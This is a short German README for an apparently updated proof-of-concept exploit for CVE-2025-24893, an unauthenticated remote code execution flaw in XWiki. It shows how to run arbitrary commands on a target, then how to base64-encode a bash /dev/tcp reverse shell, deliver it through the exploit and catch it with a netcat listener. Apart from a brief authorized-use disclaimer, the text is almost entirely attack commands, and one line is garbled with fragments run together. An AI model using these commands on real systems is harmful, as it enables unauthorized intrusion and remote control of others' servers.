
Ein aktualisierter Proof-of-Concept (PoC) Exploit für CVE-2025-24893, eine kritische, nicht authentifizierte RCE-Sicherheitslücke in XWiki. Diese Version verbessert das Original, indem sie die Ausführung beliebiger Shell-Befehle und eine saubere Reverse-Shell-Injektion ermöglicht.
Von: HexHunter404
Dieser Code wird ausschließlich für Bildungszwecke und autorisierte Penetrationstests bereitgestellt.
Verwenden Sie ihn nicht auf Systemen, die Sie nicht besitzen oder für die Sie keine ausdrückliche Genehmigung zum Testen haben.
bash -c '<command>'/xwiki-Pfad bei und vermeidet Weiterleitungsschleifenpython3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"
. Base64-kodieren Sie Ihre Reverse Shell
echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64
. Senden Sie es mit dem PoC
python3 CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"
. Richten Sie Ihren Listener ein
nc -lvnp 4444
Bei Erfolg erhalten Sie eine Shell